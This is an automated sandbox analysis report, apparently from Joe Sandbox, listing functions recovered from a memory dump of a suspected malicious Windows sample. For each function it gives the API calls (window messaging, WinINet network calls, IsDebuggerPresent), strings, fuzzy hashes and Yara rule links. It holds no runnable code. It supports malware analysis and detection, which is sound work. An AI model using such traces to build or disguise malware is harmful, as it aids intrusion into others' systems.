Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
Instruction ID: 59a6b92258ae428b4c784bb7334ded044bfd754d193912f40322a78becad1da2
Opcode Fuzzy Hash: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
Instruction Fuzzy Hash: 3841DB71A00309BADF229BA5CC49FEFB7BDDF85710F01446AF904EB185D6719E048B65

Function 003A0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003A057F

Strings

DdB, xrefs: 0036A317
DdB, xrefs: 0036A151

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClearVariant
String ID: DdB$DdB
API String ID: 1473721057-1576950555
Opcode ID: c8c598f0a38f1d1b03bab06910fedb050de12bd653f2aaf911dce94ff046895b
Instruction ID: a6ed08982816c587d95862d6a9aae34e970d59d9420a0b56d7361569a88c7fd8
Opcode Fuzzy Hash: c8c598f0a38f1d1b03bab06910fedb050de12bd653f2aaf911dce94ff046895b
Instruction Fuzzy Hash: 855121786087418FD766DF18C480A1ABBF1FB99344F96885DE8859B324D332EC81CF96

Function 003D258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003D259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003D25D4

Strings

|, xrefs: 003D25A5

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
Instruction ID: b1748c5b32ac76d98da0baee56c20ff033ef56caa4f8a864591abf7a9b9cb9a5
Opcode Fuzzy Hash: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
Instruction Fuzzy Hash: D6311A71800219ABCF02EFA1DC85EEEBFB8FF18314F10405AF955AA265DB319955DB60

Function 003E7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 003E7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E7B76

Strings

', xrefs: 003E7ACA

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
Instruction ID: 3f1531183d23ce4646805f9d8b0c41561ff64eb5b8e59e12b986c930f54972d3
Opcode Fuzzy Hash: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
Instruction Fuzzy Hash: 83411B74A0525A9FDB15CF65D881BEABBB9FF08300F11427AE904EB391E770A951CF90

Function 003E6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 003E6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E6B53

Strings

static, xrefs: 003E6AB3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
Instruction ID: 01479ae36c9f9fcf19e3f9e3e4a25e80024d40c7046e78f7039f076d22b173a4
Opcode Fuzzy Hash: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
Instruction Fuzzy Hash: B731CF71200254AEDB129F26CC81BFB73ADFF987A0F108629F9A5D7190DB70AC81C760

Function 003C28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C294C

Strings

0, xrefs: 003C290A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 64b90eaa48197bf24147445851be88923091ec9eca332baefd7d84fa2bdb622f
Instruction ID: 46539e966b7e1c037ac61daeb3da4c902b627d2da75ef221561618e818a33c9e
Opcode Fuzzy Hash: 64b90eaa48197bf24147445851be88923091ec9eca332baefd7d84fa2bdb622f
Instruction Fuzzy Hash: CA31BD31A00305EBEB2ADF58C885FAFBBB8EF45350F16002DE985EA1A0D7B09D54CB51

Function 003E66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E676C

Strings

Combobox, xrefs: 003E672E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
Instruction ID: 3d494aa78a2674d19ffdd01a0637290a09798585e67521f29ab1a338f6427b7a
Opcode Fuzzy Hash: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
Instruction Fuzzy Hash: C711B6713002586FEF228F55CC81EFB376AEB543A8F114225F9149B2D0D671DC5187A0

Function 003E6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91

GetWindowRect.USER32(00000000,?), ref: 003E6C71
GetSysColor.USER32(00000012), ref: 003E6C8B

Strings

static, xrefs: 003E6C4E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
Instruction ID: 2d249cebef2edb121c710c6bec0d1649db31afefdb3d89928a6e4654918e78b9
Opcode Fuzzy Hash: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
Instruction Fuzzy Hash: 7E218972610259AFDF05DFA9CC46AFA7BB8FB08304F104628F995D2280E730E850DB60

Function 003E6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 003E69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E69B1

Strings

edit, xrefs: 003E6986

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
Instruction ID: 884fa5feeca3d85b95f0d4340e9ca3925afa5571bff329821de2bc8604323d77
Opcode Fuzzy Hash: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
Instruction Fuzzy Hash: C4119D711001A8AFEB128E659C82AEB3669EB663B4F514724F9A0961E1C771DC509760

Function 003C29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003C2A41

Strings

0, xrefs: 003C2A18

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
Instruction ID: ea24e4fb2844b129b8fd696d0a2a66eb74d6ee09d0b44da3a2046affcaa0de06
Opcode Fuzzy Hash: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
Instruction Fuzzy Hash: 9411083AA01518AFCF32EB98DC44FAB77BCAB45300F064039E855E7290DB70AD0AC795

Function 003D21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003D222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003D2255

Strings

<local>, xrefs: 003D221D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
Instruction ID: 4e8edb08eac8f48308ed58d8fc80a5c3e822c14eeeac6c55d6957a850b0d9896
Opcode Fuzzy Hash: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
Instruction Fuzzy Hash: D2110272501265BEDB268F11AC84EFBFBACFF26351F10862BF90446640D2705990D6F0

Function 0037092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

_wcscat.LIBCMT ref: 003A4CB7

Strings

SB, xrefs: 003709AE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SB
API String ID: 257928180-3983915703
Opcode ID: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
Instruction ID: 7315992da958bb8e8b16e9d4d4ab1a3c23a9ff7fea0552b4385f18796465ee5e
Opcode Fuzzy Hash: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
Instruction Fuzzy Hash: 4B11E531A052189ACB12FB74C802EDE73F8EF09350B40C5A6BA48DB195EBB496844B14

Function 003B8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003B8E73

Strings

ListBox, xrefs: 003B8E3D
ComboBox, xrefs: 003B8E12

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
Instruction ID: 2d31360ddf744b3652359c522eb3927acec43800e94aa0da7ec39f1eae7cd56a
Opcode Fuzzy Hash: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
Instruction Fuzzy Hash: 24012471605228ABCB16FBA4CC819FE736CEF01320B104A19F9715B6E1DF319808C660

Function 003C8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003C8DAC
__fread_nolock.LIBCMT ref: 003C8DC1

Strings

EA06, xrefs: 003C8DF3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
Instruction ID: 61caae64fed9a80aa9d7746dabc1d65c8d17ec58b317635cd1ea23610cd3bb36
Opcode Fuzzy Hash: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
Instruction Fuzzy Hash: DF01D6718046186EDB19DBA8C816EEABBF89B11301F00459EF553D6181E974AA088760

Function 003B8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 003B8D6B

Strings

ListBox, xrefs: 003B8D35
ComboBox, xrefs: 003B8D0A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
Instruction ID: 653a26673d7c33c44e57d93521ded935adaa0aa98d9e35969caf601c69d6833d
Opcode Fuzzy Hash: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
Instruction Fuzzy Hash: 5501F271B41508ABCB17EBA0C992EFE73ACDF15300F10002EB9026B6E1DE249E08D671

Function 003B8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 003B8DEE

Strings

ListBox, xrefs: 003B8DBA
ComboBox, xrefs: 003B8D8F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
Instruction ID: 5134c1d01654e9e8e230317003c9b26551574df0972275876a3701a343945761
Opcode Fuzzy Hash: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
Instruction Fuzzy Hash: E3012671B45108BBCF13EBA4C992EFE73ACCF21304F10402AB901AB6D2DE258E08D671

Function 003BC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003BC534

Part of subcall function 003BC816: _memmove.LIBCMT ref: 003BC860
Part of subcall function 003BC816: VariantInit.OLEAUT32(00000000), ref: 003BC882
Part of subcall function 003BC816: VariantCopy.OLEAUT32(00000000,?), ref: 003BC88C

VariantClear.OLEAUT32(?), ref: 003BC556

Strings

d}A, xrefs: 003BC517

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}A
API String ID: 2932060187-735431763
Opcode ID: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
Instruction ID: 189d5d19045e8fbaf5d52fc7a489cccaaccc922b93c03619368bf55e9d55031b
Opcode Fuzzy Hash: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
Instruction Fuzzy Hash: 7111FAB19007089FC721DFAAD8C49DAB7F8FB08314B50862FE58AD7651E771AA44CF90

Function 003C4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 003C4F46
_wcscmp.LIBCMT ref: 003C4F58

Strings

#32770, xrefs: 003C4F52

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
Instruction ID: 96837803a5a51cfffb10cb8debc2d8c2558013f16f3f7af9938bd93dd1e236fa
Opcode Fuzzy Hash: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
Instruction Fuzzy Hash: 62E092326002282AD720AA99AC49FE7FBACEB45B60F01016BFD04D7151D9709B458BE4

Function 0039B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0039B314: _memset.LIBCMT ref: 0039B321

Part of subcall function 00380940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0039B2F0,?,?,?,0036100A), ref: 00380945

IsDebuggerPresent.KERNEL32(?,?,?,0036100A), ref: 0039B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0036100A), ref: 0039B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0039B2FE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

